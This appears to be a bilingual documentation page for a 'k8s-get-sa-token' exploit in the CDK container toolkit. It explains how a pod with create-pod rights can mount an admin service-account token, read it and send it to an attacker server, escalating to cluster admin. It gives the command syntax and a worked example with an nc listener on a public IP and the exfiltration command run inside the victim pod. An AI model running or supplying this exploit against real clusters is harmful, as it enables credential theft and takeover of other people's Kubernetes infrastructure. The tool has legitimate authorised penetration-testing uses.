Exploit: k8s get sa token

Bypass K8s RBAC with pod create privilege. This exploit will create a pod with target(admin) service-account token mounted, then read the token and send it to remote IP:Port.

绕过K8s RBAC：如果当前的Pod有创建Pod权限，即可利用本EXP进行提权到Cluster Admin。本EXP将创建一个Pod并挂在目标service-account的token，之后在Pod中读取该token并发送到攻击者的公网服务器。

Usage

cdk run k8s-get-sa-token (default|anonymous|<service-account-token-path>) <target-service-account> <ip> <port>"

Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.

Exploit Options:
target-service-account: target service-account token to dump(e.g. admin).
ip: target remote IP to hijack traffic.
port: target remote PORT to hijack traffic.

Example

First listen a port in a public server to receive data

(on attacker's public server, e.g. 39.104.80.49)
nc -lvp 999

Inside victim pod which has "create pod" privilege, run CDK exploit to dump "admin" service-account's token.

(in victim pod)
./cdk run k8s-get-sa-token default admin 39.104.80.49 999